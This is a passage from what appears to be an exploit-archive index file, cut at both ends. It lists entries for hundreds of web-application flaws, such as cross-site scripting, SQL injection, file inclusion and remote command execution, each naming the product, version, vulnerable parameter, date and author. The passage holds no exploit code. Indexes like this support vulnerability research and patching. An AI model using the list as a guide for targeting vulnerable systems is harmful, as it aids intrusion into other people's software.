Vulnerabilities",2009-10-21,"Amol Naik",webapps,php, +33297,exploits/php/webapps/33297.txt,"OpenDocMan 1.2.5 - 'index.php?last_message' Cross-Site Scripting",2009-10-21,"Amol Naik",webapps,php, +33298,exploits/php/webapps/33298.txt,"OpenDocMan 1.2.5 - 'admin.php?last_message' Cross-Site Scripting",2009-10-21,"Amol Naik",webapps,php, +33299,exploits/php/webapps/33299.txt,"OpenDocMan 1.2.5 - 'category.php' Cross-Site Scripting",2009-10-21,"Amol Naik",webapps,php, +33300,exploits/php/webapps/33300.txt,"OpenDocMan 1.2.5 - 'department.php' Cross-Site Scripting",2009-10-21,"Amol Naik",webapps,php, +33301,exploits/php/webapps/33301.txt,"OpenDocMan 1.2.5 - 'profile.php' Cross-Site Scripting",2009-10-21,"Amol Naik",webapps,php, +33302,exploits/php/webapps/33302.txt,"OpenDocMan 1.2.5 - 'rejects.php' Cross-Site Scripting",2009-10-21,"Amol Naik",webapps,php, +33303,exploits/php/webapps/33303.txt,"OpenDocMan 1.2.5 - 'search.php' Cross-Site Scripting",2009-10-21,"Amol Naik",webapps,php, +33304,exploits/php/webapps/33304.txt,"OpenDocMan 1.2.5 - 'user.php' Cross-Site Scripting",2009-10-21,"Amol Naik",webapps,php, +33305,exploits/php/webapps/33305.txt,"OpenDocMan 1.2.5 - 'view_file.php' Cross-Site Scripting",2009-10-21,"Amol Naik",webapps,php, +33307,exploits/php/webapps/33307.php,"RunCMS - 'forum' SQL Injection",2009-10-26,Nine:Situations:Group::bookoo,webapps,php, +33308,exploits/php/webapps/33308.txt,"Sahana 0.6.2 - 'mod' Local File Disclosure",2009-10-27,"Greg Miernicki",webapps,php, +33309,exploits/php/webapps/33309.txt,"TFTgallery 0.13 - 'album' Cross-Site Scripting",2009-10-26,blake,webapps,php, +33320,exploits/php/webapps/33320.txt,"TFTgallery 0.13 - 'sample' Cross-Site Scripting",2009-11-02,blake,webapps,php, +33327,exploits/hardware/webapps/33327.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Information Disclosures",2014-05-12,"Luigi Vezzoso",webapps,hardware, +33341,exploits/php/webapps/33341.txt,"CuteNews 1.4.6 - 'from_date_day' Full Path Disclosure",2009-11-10,"Andrew Horton",webapps,php, +33330,exploits/windows/webapps/33330.txt,"SpiceWorks 7.2.00174 - Persistent Cross-Site Scripting",2014-05-12,"Dolev Farhi",webapps,windows,80 +33334,exploits/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",webapps,cgi,80 +33353,exploits/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,webapps,hardware,80 +33354,exploits/php/webapps/33354.txt,"PHD Help Desk 1.43 - 'area.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,"Amol Naik",webapps,php, +33355,exploits/php/webapps/33355.txt,"PHD Help Desk 1.43 - 'solic_display.php?q_registros' Cross-Site Scripting",2009-11-16,"Amol Naik",webapps,php, +33356,exploits/php/webapps/33356.txt,"PHD Help Desk 1.43 - 'area_list.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,"Amol Naik",webapps,php, +33357,exploits/php/webapps/33357.txt,"PHD Help Desk 1.43 - 'atributo.php?URL' Cross-Site Scripting",2009-11-16,"Amol Naik",webapps,php, +33358,exploits/php/webapps/33358.txt,"PHD Help Desk 1.43 - 'atributo_list.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,"Amol Naik",webapps,php, +33359,exploits/php/webapps/33359.txt,"PHD Help Desk 1.43 - 'caso_insert.php?URL' Cross-Site Scripting",2009-11-16,"Amol Naik",webapps,php, +33361,exploits/asp/webapps/33361.txt,"JiRo's (Multiple Products) - '/files/login.asp' Multiple SQL Injections",2009-11-17,blackenedsecurity,webapps,asp, +33362,exploits/php/webapps/33362.txt,"CubeCart 3.0.4/4.3.6 - 'ProductID' SQL Injection",2009-11-19,"Sangte Amtham",webapps,php, +33365,exploits/php/webapps/33365.txt,"WordPress Plugin WP-phpList 2.10.2 - 'unsubscribeemail' Cross-Site Scripting",2009-11-29,MustLive,webapps,php, +40345,exploits/php/webapps/40345.txt,"FreePBX 13.0.x < 13.0.154 - Unauthenticated Remote Command Execution",2016-09-07,i-Hmx,webapps,php, +33366,exploits/php/webapps/33366.txt,"WordPress Plugin Trashbin 0.1 - 'mtb_undelete' Cross-Site Scripting",2009-11-15,MustLive,webapps,php, +33367,exploits/php/webapps/33367.txt,"WordPress Plugin Firestats 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,webapps,php, +33368,exploits/php/webapps/33368.html,"WordPress Plugin Firestats 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,webapps,php, +33370,exploits/multiple/webapps/33370.html,"ElasticSearch - Remote Code Execution",2014-05-15,"Jeff Geiger",webapps,multiple, +33371,exploits/php/webapps/33371.txt,"WordPress Plugin WP-Cumulus 1.x - 'tagcloud.swf' Cross-Site Scripting",2009-11-09,MustLive,webapps,php, +33372,exploits/php/webapps/33372.html,"WordPress Plugin Fuctweb CapCC 1.0 CAPTCHA - Security Bypass",2009-11-13,MustLive,webapps,php, +33373,exploits/php/webapps/33373.txt,"WordPress Plugin Subscribe to Comments 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,MustLive,webapps,php, +33374,exploits/php/webapps/33374.txt,"Cacti 0.8.x - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-21,"Moritz Naumann",webapps,php, +33375,exploits/php/webapps/33375.txt,"Quick.Cart 3.4 / Quick.CMS 2.4 - Delete Function Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",webapps,php, +33376,exploits/php/webapps/33376.pl,"klinza Professional CMS 5.0.1 - 'menulast.php' Local File Inclusion",2009-11-24,klinza,webapps,php, +33377,exploits/php/webapps/33377.txt,"Joomla! Component ProofReader 1.0 RC9 - Cross-Site Scripting",2009-11-16,MustLive,webapps,php, +33378,exploits/php/webapps/33378.txt,"Joomla! 1.5.x - 404 Error Page Cross-Site Scripting",2009-11-23,MustLive,webapps,php, +33380,exploits/php/webapps/33380.txt,"Power Phlogger 2.2.x - Cross-Site Scripting",2008-02-16,MustLive,webapps,php, +33381,exploits/php/webapps/33381.txt,"Content Module 0.5 for XOOPS - 'id' SQL Injection",2009-11-30,s4r4d0,webapps,php, +33382,exploits/php/webapps/33382.txt,"SmartMedia Module 0.85 Beta for XOOPS - 'categoryId' Cross-Site Scripting",2009-11-30,SoldierOfAllah,webapps,php, +33383,exploits/php/webapps/33383.txt,"Elxis - 'Filename' Directory Traversal",2009-11-30,cr4wl3r,webapps,php, +33385,exploits/php/webapps/33385.txt,"phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",webapps,php, +33389,exploits/php/webapps/33389.txt,"eGroupWare 1.8.006 - Multiple Vulnerabilities",2014-05-16,"High-Tech Bridge SA",webapps,php,80 +33390,exploits/php/webapps/33390.txt,"WordPress Plugin Yoast Google Analytics 3.2.4 - 404 Error Page Cross-Site Scripting",2009-12-04,intern0t,webapps,php, +33391,exploits/php/webapps/33391.txt,"Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting",2009-12-07,"aBo MoHaMeD",webapps,php, +33392,exploits/php/webapps/33392.txt,"Joomla! Component YOOtheme Warp5 - 'yt_color' Cross-Site Scripting",2009-12-04,andresg888,webapps,php, +33393,exploits/php/webapps/33393.txt,"Joomla! Component You!Hostit! 1.0.1 Template - Cross-Site Scripting",2009-12-04,andresg888,webapps,php, +33394,exploits/php/webapps/33394.txt,"Invision Power Board 3.0.3 - '.txt' MIME-Type Cross-Site Scripting",2009-12-09,Xacker,webapps,php, +33396,exploits/php/webapps/33396.txt,"Zeeways ZeeJobsite - 'basic_search_result.php' Cross-Site Scripting",2009-12-10,bi0,webapps,php, +33400,exploits/php/webapps/33400.txt,"Ez Cart - 'sid' Cross-Site Scripting",2009-12-14,anti-gov,webapps,php, +33435,exploits/php/webapps/33435.txt,"ClarkConnect Linux 5.0 - 'proxy.php' Cross-Site Scripting",2009-12-22,"Edgard Chammas",webapps,php, +33436,exploits/php/webapps/33436.txt,"PHP-Calendar 1.1 - 'update08.php?configfile' Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",webapps,php, +33437,exploits/php/webapps/33437.txt,"PHP-Calendar 1.1 - 'update10.php?configfile' Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",webapps,php, +33438,exploits/multiple/webapps/33438.txt,"webMathematica 3 - 'MSP' Script Cross-Site Scripting",2009-12-23,"Floyd Fuh",webapps,multiple, +33439,exploits/php/webapps/33439.txt,"MyBB 1.4.10 - 'myps.php' Cross-Site Scripting",2009-12-24,"Steven Abbagnaro",webapps,php, +33440,exploits/php/webapps/33440.txt,"Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion",2009-12-29,F10riX,webapps,php, +33441,exploits/php/webapps/33441.txt,"Joomla! Component Joomulus 2.0 - 'tagcloud.swf' Cross-Site Scripting",2009-12-28,MustLive,webapps,php, +33442,exploits/php/webapps/33442.txt,"FreePBX 2.5.2 - '/admin/config.php?tech' Cross-Site Scripting",2009-12-28,Global-Evolution,webapps,php, +33443,exploits/php/webapps/33443.txt,"FreePBX 2.5.2 - Zap Channel Addition Description Parameter Cross-Site Scripting",2009-12-28,Global-Evolution,webapps,php, +33445,exploits/php/webapps/33445.txt,"PHPInstantGallery 1.1 - 'admin.php' Cross-Site Scripting",2009-12-26,indoushka,webapps,php, +33446,exploits/php/webapps/33446.txt,"Barbo91 - 'upload.php' Cross-Site Scripting",2009-12-25,indoushka,webapps,php, +33447,exploits/php/webapps/33447.php,"FreeWebShop 2.2.9 R2 - Multiple Remote Vulnerabilities",2009-12-29,"Akita Software Security",webapps,php, +33448,exploits/php/webapps/33448.txt,"AzDGDatingMedium 1.9.3 - 'l' Multiple Cross-Site Scripting Vulnerabilities",2009-12-29,indoushka,webapps,php, +33449,exploits/php/webapps/33449.txt,"PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass",2009-12-31,indoushka,webapps,php, +33450,exploits/php/webapps/33450.txt,"SendStudio 4.0.1 - Cross-Site Scripting / Security Bypass",2009-12-31,indoushka,webapps,php, +33451,exploits/php/webapps/33451.txt,"BosClassifieds 1.20 - 'recent.php' Cross-Site Scripting",2009-12-31,indoushka,webapps,php, +33452,exploits/php/webapps/33452.txt,"Imagevue r16 - 'amount' Cross-Site Scripting",2009-12-31,indoushka,webapps,php, +33455,exploits/hardware/webapps/33455.txt,"Binatone DT 850W Wireless Router - Multiple Cross-Site Request Forgery Vulnerabilities",2014-05-21,"Samandeep Singh",webapps,hardware, +33456,exploits/php/webapps/33456.txt,"StarDevelop Live Help 2.6 - 'SERVER' Multiple Cross-Site Scripting Vulnerabilities",2009-12-31,indoushka,webapps,php, +33457,exploits/php/webapps/33457.txt,"PhotoKorn 1.542 - Cross-Site Scripting / Remote File Inclusion",2009-12-31,indoushka,webapps,php, +33458,exploits/php/webapps/33458.txt,"Discuz! 1.0 - 'referer' Cross-Site Scripting",2009-12-31,indoushka,webapps,php, +33459,exploits/php/webapps/33459.txt,"DieselPay 1.6 - Cross-Site Scripting / Directory Traversal",2009-12-31,indoushka,webapps,php, +33460,exploits/php/webapps/33460.txt,"Reamday Enterprises Magic News Plus 1.0.2 - Cross-Site Scripting",2010-01-01,indoushka,webapps,php, +33461,exploits/php/webapps/33461.txt,"PHPCart 3.1.2 - 'search.php' Cross-Site Scripting",2010-01-01,indoushka,webapps,php, +33462,exploits/php/webapps/33462.txt,"VirtuaSystems VirtuaNews Pro 1.0.4 - 'admin.php' Cross-Site Scripting",2010-01-01,indoushka,webapps,php, +33463,exploits/php/webapps/33463.txt,"VisionGate 1.6 - 'login.php' Cross-Site Scripting",2010-01-01,indoushka,webapps,php, +33464,exploits/php/webapps/33464.txt,"Discuz! 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-03,indoushka,webapps,php, +33465,exploits/php/webapps/33465.txt,"SLAED CMS 2.0 - 'stop' Cross-Site Scripting",2010-01-03,indoushka,webapps,php, +33466,exploits/php/webapps/33466.txt,"pL-PHP 0.9 - 'index.php' Cross-Site Scripting",2010-01-04,indoushka,webapps,php, +33467,exploits/php/webapps/33467.txt,"WMNews - '/admin/wmnews.php' Cross-Site Scripting",2010-01-04,indoushka,webapps,php, +33468,exploits/php/webapps/33468.txt,"MercuryBoard 1.1.5 - 'index.php' Cross-Site Scripting",2010-01-04,indoushka,webapps,php, +33469,exploits/php/webapps/33469.txt,"LXR 0.9.x - Cross Referencer Multiple Cross-Site Scripting Vulnerabilities",2010-01-05,"Dan Rosenberg",webapps,php, +33470,exploits/php/webapps/33470.txt,"LineWeb 1.0.5 - Multiple Remote Vulnerabilities",2010-01-05,"Ignacio Garrido",webapps,php, +33473,exploits/php/webapps/33473.txt,"Roundcube Webmail 0.2 - Cross-Site Scripting",2010-01-06,"j4ck & Globus",webapps,php, +33474,exploits/php/webapps/33474.txt,"Joomla! Component DM Orders - 'id' SQL Injection",2010-01-07,NoGe,webapps,php, +33475,exploits/php/webapps/33475.txt,"dotProject 2.1.3 - Multiple SQL Injections / HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",webapps,php, +33478,exploits/php/webapps/33478.txt,"Joomla! Component Jobads - 'type' SQL Injection",2010-01-08,N0KT4,webapps,php, +33482,exploits/php/webapps/33482.txt,"DigitalHive - 'mt' Cross-Site Scripting",2010-01-10,ViRuSMaN,webapps,php, +33484,exploits/php/webapps/33484.txt,"DELTAScripts PHP Links 1.0 - 'email' Cross-Site Scripting",2010-01-11,Crux,webapps,php, +33485,exploits/php/webapps/33485.txt,"Jamit Job Board - 'post_id' Cross-Site Scripting",2010-01-11,Crux,webapps,php, +33486,exploits/php/webapps/33486.txt,"@lex Guestbook 5.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"D3V!L FUCKER",webapps,php, +33487,exploits/php/webapps/33487.txt,"PHPepperShop 2.5 - 'USER_ARTIKEL_HANDLING_AUFRUF.php' Cross-Site Scripting",2010-01-12,Crux,webapps,php, +33488,exploits/php/webapps/33488.txt,"Active Calendar 1.2 - '$_SERVER['PHP_SELF']' Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",webapps,php, +33493,exploits/multiple/webapps/33493.txt,"Mayan-EDms Web-Based Document Management OS System - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-05-24,"Dolev Farhi",webapps,multiple, +33494,exploits/cgi/webapps/33494.txt,"Web Terra 1.1 - 'books.cgi' Remote Command Execution",2014-05-24,"felipe andrian",webapps,cgi, +33582,exploits/php/webapps/33582.txt,"Joomla! Component com_rsgallery2 2.0 - 'catid' SQL Injection",2010-01-31,snakespc,webapps,php, +33505,exploits/php/webapps/33505.txt,"Docmint 1.0/2.1 - 'id' Cross-Site Scripting",2010-01-12,Red-D3v1L,webapps,php, +33507,exploits/php/webapps/33507.txt,"Simple PHP Blog 0.5.x - 'search.php' Cross-Site Scripting",2010-01-12,Sora,webapps,php, +33509,exploits/php/webapps/33509.txt,"Joomla! Component com_tienda - 'categoria' Cross-Site Scripting",2010-01-13,FL0RiX,webapps,php, +33510,exploits/php/webapps/33510.txt,"Tribisur - 'cat' Cross-Site Scripting",2010-01-13,ViRuSMaN,webapps,php, +33511,exploits/multiple/webapps/33511.txt,"Zenoss 2.3.3 - Multiple SQL Injections",2010-01-14,"nGenuity Information Services",webapps,multiple, +33514,exploits/php/webapps/33514.txt,"Videos Tube 1.0 - Multiple SQL Injections",2014-05-26,"Mustafa ALTINKAYNAK",webapps,php,80 +33646,exploits/php/webapps/33646.txt,"Joomla! Component MS Comment 0.8.0b - Security Bypass / Cross-Site Scripting",2009-12-31,"Jeff Channell",webapps,php, +33518,exploits/hardware/webapps/33518.txt,"ZYXEL P-660HW-T1 3 Wireless Router - Cross-Site Request Forgery",2014-05-26,"Mustafa ALTINKAYNAK",webapps,hardware,80 +33520,exploits/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",webapps,hardware,80 +33574,exploits/php/webapps/33574.txt,"Discuz! 6.0 - 'tid' Cross-Site Scripting",2010-01-27,s4r4d0,webapps,php, +33575,exploits/cfm/webapps/33575.txt,"CommonSpot Server - '/utilities/longproc.cfm' Cross-Site Scripting",2010-01-28,"Richard Brain",webapps,cfm, +33526,exploits/php/webapps/33526.txt,"Technology for Solutions 1.0 - 'id' Cross-Site Scripting",2010-01-14,PaL-D3v1L,webapps,php, +33528,exploits/php/webapps/33528.txt,"Xforum 1.4 - 'nbpageliste' Cross-Site Scripting",2010-01-14,ViRuSMaN,webapps,php, +33529,exploits/php/webapps/33529.txt,"Joomla! Component com_marketplace 1.2 - 'catid' Cross-Site Scripting",2010-01-14,ViRuSMaN,webapps,php, +33530,exploits/php/webapps/33530.txt,"LetoDms 1.4.x - 'lang' Local File Inclusion",2010-01-15,"D. Fabian",webapps,php, +33534,exploits/php/webapps/33534.txt,"TestLink 1.8.5 - 'order_by_login_dir' Cross-Site Scripting",2010-01-18,"Prashant Khandelwal",webapps,php, +33636,exploits/php/webapps/33636.sh,"Interspire Knowledge Manager 5 - 'callback.snipshot.php' Arbitrary File Creation",2010-02-03,"Cory Marsh",webapps,php, +33637,exploits/php/webapps/33637.txt,"Joomla! Component Webee Comments 1.1/1.2 - 'index2.php' articleId SQL Injection",2009-11-15,"Jeff Channell",webapps,php, +33638,exploits/php/webapps/33638.txt,"Joomla! Component Webee Comments 1.1/1.2 - Multiple BBCode Tags Cross-Site Scripting Vulnerabilities",2009-11-15,"Jeff Channell",webapps,php, +33639,exploits/php/webapps/33639.txt,"Joomla! Component EasyBook 2.0.0rc4 - Multiple HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",webapps,php, +33634,exploits/php/webapps/33634.txt,"CommodityRentals CD Rental Software - 'index.php' SQL Injection",2010-02-11,"Don Tukulesto",webapps,php, +33541,exploits/php/webapps/33541.txt,"DataLife Engine 8.3 - '/engine/inc/include/init.php?selected_language' Remote File Inclusion",2010-01-19,indoushka,webapps,php, +33542,exploits/php/webapps/33542.txt,"DataLife Engine 8.3 - '/engine/inc/help.php?config[langs]' Remote File Inclusion",2010-01-19,indoushka,webapps,php, +33543,exploits/php/webapps/33543.txt,"DataLife Engine 8.3 - '/engine/ajax/pm.php?config[lang]' Remote File Inclusion",2010-01-19,indoushka,webapps,php, +33544,exploits/php/webapps/33544.txt,"DataLife Engine 8.3 - '/engine/ajax/addcomments.php?_REQUEST[skin]' Remote File Inclusion",2010-01-19,indoushka,webapps,php, +33545,exploits/php/webapps/33545.txt,"Easysitenetwork Jokes Complete Website - 'id' Cross-Site Scripting",2010-01-18,indoushka,webapps,php, +33546,exploits/php/webapps/33546.txt,"Easysitenetwork Jokes Complete Website - 'searchingred' Cross-Site Scripting",2010-01-18,indoushka,webapps,php, +33547,exploits/php/webapps/33547.pl,"vBulletin 4.0.1 - 'misc.php' SQL Injection",2010-01-18,indoushka,webapps,php, +33550,exploits/php/webapps/33550.txt,"VisualShapers EZContents 2.0.3 - Authentication Bypass / Multiple SQL Injections",2010-01-19,"AmnPardaz Security Research Team",webapps,php, +33551,exploits/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' SQL Injection",2010-01-20,Ctacok,webapps,php, +33555,exploits/php/webapps/33555.txt,"AuraCMS 3.0 - Multiple Vulnerabilities",2014-05-28,"Mustafa ALTINKAYNAK",webapps,php, +33557,exploits/php/webapps/33557.txt,"Sharetronix 3.3 - Multiple Vulnerabilities",2014-05-28,"High-Tech Bridge SA",webapps,php,80 +33558,exploits/php/webapps/33558.txt,"cPanel and WHM 11.25 - 'failurl' HTTP Response Splitting",2010-01-21,Trancer,webapps,php, +33561,exploits/php/webapps/33561.txt,"OpenX 2.6.1 - SQL Injection",2010-01-22,AndySoon,webapps,php, +33564,exploits/jsp/webapps/33564.txt,"Jetty 6.1.x - JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities",2009-10-24,aScii,webapps,jsp, +40752,exploits/php/webapps/40752.py,"InvoicePlane 1.4.8 - Password Reset",2016-11-11,feedersec,webapps,php, +33566,exploits/php/webapps/33566.txt,"Joomla! Component 3D Cloud - 'tagcloud.swf' Cross-Site Scripting",2010-01-26,MustLive,webapps,php, +33586,exploits/php/webapps/33586.txt,"Joomla! Component com_gambling - 'gamblingEvent' SQL Injection",2010-02-01,md.r00t,webapps,php, +33595,exploits/php/webapps/33595.txt,"Interspire Knowledge Manager < 5.1.3 - Multiple Remote Vulnerabilities",2010-02-04,"Cory Marsh",webapps,php, +33596,exploits/jsp/webapps/33596.txt,"KnowGate hipergate 4.0.12 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-04,"Nahuel Grisolia",webapps,jsp, +33597,exploits/php/webapps/33597.txt,"Data 1 Systems UltraBB 1.17 - 'view_post.php' Cross-Site Scripting",2010-02-04,s4r4d0,webapps,php, +33602,exploits/php/webapps/33602.txt,"evalSMSI 2.1.3 - Multiple Input Validation Vulnerabilities",2010-02-05,ekse,webapps,php, +33603,exploits/php/webapps/33603.html,"LANDesk Management Gateway 4.x - Multiple Vulnerabilities",2010-02-05,"Aureliano Calvo",webapps,php, +33605,exploits/php/webapps/33605.php,"ASCET Interactive Huski CMS - 'i' Local File Inclusion",2010-02-05,Wireghoul,webapps,php, +33606,exploits/php/webapps/33606.txt,"ASCET Interactive Huski Retail - Multiple SQL Injections",2010-02-05,Wireghoul,webapps,php, +33613,exploits/php/webapps/33613.txt,"WordPress Plugin Participants Database 1.5.4.8 - SQL Injection",2014-06-02,"Yarubo Research Team",webapps,php,80 +33617,exploits/php/webapps/33617.txt,"Aflam Online 1.0 - 'index.php' SQL Injection",2010-02-08,alnjm33,webapps,php, +33618,exploits/php/webapps/33618.txt,"Zen Time Tracking 2.2 - Multiple SQL Injections",2010-02-08,cr4wl3r,webapps,php, +33619,exploits/php/webapps/33619.txt,"VideoDB 3.0.3 - 'login.php' Cross-Site Scripting",2010-02-08,vr,webapps,php, +33621,exploits/php/webapps/33621.txt,"vBulletin Adsense Component - 'viewpage.php' SQL Injection",2010-02-09,JIKO,webapps,php, +33624,exploits/php/webapps/33624.txt,"vBulletin 3.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-11,ROOT_EGY,webapps,php, +33626,exploits/php/webapps/33626.txt,"PHPBTTracker+ 2.2 - SQL Injection",2014-06-03,"BackBox Linux Team",webapps,php,80 +33627,exploits/ios/webapps/33627.txt,"NG WifiTransfer Pro 1.1 - Local File Inclusion",2014-06-03,Vulnerability-Lab,webapps,ios,8080 +33628,exploits/ios/webapps/33628.txt,"Files Desk Pro 1.4 iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,webapps,ios,8081 +33629,exploits/ios/webapps/33629.txt,"Privacy Pro 1.2 HZ iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,webapps,ios,56380 +33630,exploits/ios/webapps/33630.txt,"TigerCom My Assistant 1.1 iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,webapps,ios,8080 +33631,exploits/ios/webapps/33631.txt,"AllReader 1.0 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,webapps,ios,8080 +33632,exploits/ios/webapps/33632.txt,"Bluetooth Photo-File Share 2.1 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,webapps,ios,8080 +33633,exploits/windows/webapps/33633.txt,"IPSwitch IMail Server WEB client 12.4 - Persistent Cross-Site Scripting",2014-06-03,Peru,webapps,windows, +33644,exploits/php/webapps/33644.txt,"Basic-CMS - 'nav_id' Cross-Site Scripting",2010-02-12,Red-D3v1L,webapps,php, +33641,exploits/php/webapps/33641.txt,"Joomla! Component F!BB 1.5.96 RC - SQL Injection / HTML Injection",2009-09-17,"Jeff Channell",webapps,php, +33643,exploits/php/webapps/33643.txt,"CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting",2010-02-12,"Beenu Arora",webapps,php, +33647,exploits/asp/webapps/33647.txt,"Portrait Software Portrait Campaign Manager 4.6.1.22 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-16,"Roel Schouten",webapps,asp, +33649,exploits/php/webapps/33649.txt,"BGSvetionik BGS CMS - 'search' Cross-Site Scripting",2010-02-16,hacker@sr.gov.yu,webapps,php, +33650,exploits/php/webapps/33650.txt,"Extreme Mobster - 'login' Cross-Site Scripting",2010-02-16,indoushka,webapps,php, +33651,exploits/php/webapps/33651.txt,"EziScript Google Page Rank 1.1 - Cross-Site Scripting",2010-02-16,sarabande,webapps,php, +33652,exploits/php/webapps/33652.txt,"New-CMS 1.08 - Multiple Local File Inclusion / HTML Injection Vulnerabilities",2010-02-18,"Alberto Fontanella",webapps,php, +33654,exploits/php/webapps/33654.py,"Madness Pro 1.14 - Persistent Cross-Site Scripting",2014-06-06,bwall,webapps,php, +33655,exploits/php/webapps/33655.py,"Madness Pro 1.14 - SQL Injection",2014-06-06,bwall,webapps,php, +33656,exploits/php/webapps/33656.txt,"XlentProjects SphereCMS 1.1 - 'archive.php' SQL Injection",2010-02-18,"AmnPardaz Security Research Team",webapps,php, +33657,exploits/php/webapps/33657.txt,"Subex Nikira Fraud Management System GUI - 'message' Cross-Site Scripting",2010-02-18,thebluegenius,webapps,php, +33658,exploits/php/webapps/33658.txt,"Social Web CMS 2 - 'index.php' Cross-Site Scripting",2010-02-19,GoLdeN-z3r0,webapps,php, +40343,exploits/php/webapps/40343.txt,"CumulusClips 2.4.1 - Multiple Vulnerabilities",2016-09-07,kor3k,webapps,php,80 +33659,exploits/php/webapps/33659.txt,"Joomla! Component com_recipe - Multiple SQL Injections",2010-02-20,FL0RiX,webapps,php, +33660,exploits/php/webapps/33660.txt,"vBulletin 4.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-20,indoushka,webapps,php, +33661,exploits/php/webapps/33661.txt,"Galerie Dezign-Box - Multiple Input Validation Vulnerabilities",2010-02-22,indoushka,webapps,php, +33665,exploits/php/webapps/33665.txt,"Softbiz Jobs - 'sbad_type' Cross-Site Scripting",2010-02-23,"pratul agrawal",webapps,php, +33675,exploits/jsp/webapps/33675.txt,"IBM (Multiple Products) - Login Page Cross-Site Scripting",2010-02-25,"Oren Hafif",webapps,jsp, +33676,exploits/php/webapps/33676.txt,"Newbie CMS 0.0.2 - Insecure Cookie Authentication Bypass",2010-02-25,JIKO,webapps,php, +33678,exploits/jsp/webapps/33678.txt,"ARISg 5.0 - 'wflogin.jsp' Cross-Site Scripting",2010-02-26,"Yaniv Miron",webapps,jsp, +33673,exploits/php/webapps/33673.pl,"Joomla! Component HD FLV Player - 'id' SQL Injection",2010-02-24,kaMtiEz,webapps,php, +33674,exploits/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 - Multiple Local File Inclusions",2010-02-24,JIKO,webapps,php, +33679,exploits/php/webapps/33679.txt,"TRUC 0.11 - 'login_reset_password_page.php' Cross-Site Scripting",2010-02-28,snakespc,webapps,php, +33680,exploits/php/webapps/33680.txt,"Open Educational System 0.1 Beta - 'CONF_INCLUDE_PATH' Multiple Remote File Inclusions",2010-02-28,cr4wl3r,webapps,php, +33681,exploits/php/webapps/33681.txt,"SLAED CMS 4 - Installation Script Unauthorized Access",2010-02-27,indoushka,webapps,php, +33683,exploits/php/webapps/33683.txt,"Article Friendly - 'Filename' Local File Inclusion",2010-03-01,"pratul agrawal",webapps,php, +33684,exploits/php/webapps/33684.txt,"Blax Blog 0.1 - 'girisyap.php' SQL Injection",2010-03-01,cr4wl3r,webapps,php, +33685,exploits/php/webapps/33685.html,"DeDeCMS 5.5 - '_SESSION[dede_admin_id]' Authentication Bypass",2010-03-01,"Wolves Security Team",webapps,php, +33687,exploits/java/webapps/33687.txt,"Sparta Systems TrackWise EQms - Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",webapps,java, +33688,exploits/php/webapps/33688.txt,"Discuz! 6.0 - 'uid' Cross-Site Scripting",2010-03-02,"lis cker",webapps,php, +33691,exploits/jsp/webapps/33691.txt,"Comptel Provisioning and Activation - 'index.jsp?error_msg_parameter' Cross-Site Scripting",2010-03-04,thebluegenius,webapps,jsp, +33706,exploits/php/webapps/33706.txt,"Drupal < 5.22/6.16 - Multiple Vulnerabilities",2010-03-04,"David Rothstein",webapps,php, +33704,exploits/asp/webapps/33704.txt,"BBSXP 2008 - 'ShowPost.asp' Cross-Site Scripting",2010-03-04,Liscker,webapps,asp, +33697,exploits/php/webapps/33697.txt,"eFront 3.6.14.4 - 'surname' Persistent Cross-Site Scripting",2014-06-09,"shyamkumar somana",webapps,php,80 +33699,exploits/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",webapps,php,80 +33700,exploits/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 < 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",webapps,asp,80 +33702,exploits/php/webapps/33702.txt,"ZeroCMS 1.0 - 'zero_view_article.php' SQL Injection",2014-06-10,LiquidWorm,webapps,php,80 +33714,exploits/php/webapps/33714.txt,"SHOUTcast DNAS 2.2.1 - Persistent Cross-Site Scripting",2014-06-11,rob222,webapps,php, +33715,exploits/asp/webapps/33715.txt,"Spectrum Software WebManager CMS - 'pojam' Cross-Site Scripting",2010-03-05,hacker@sr.gov.yu,webapps,asp, +33716,exploits/php/webapps/33716.txt,"Saskia's ShopSystem - 'id' Local File 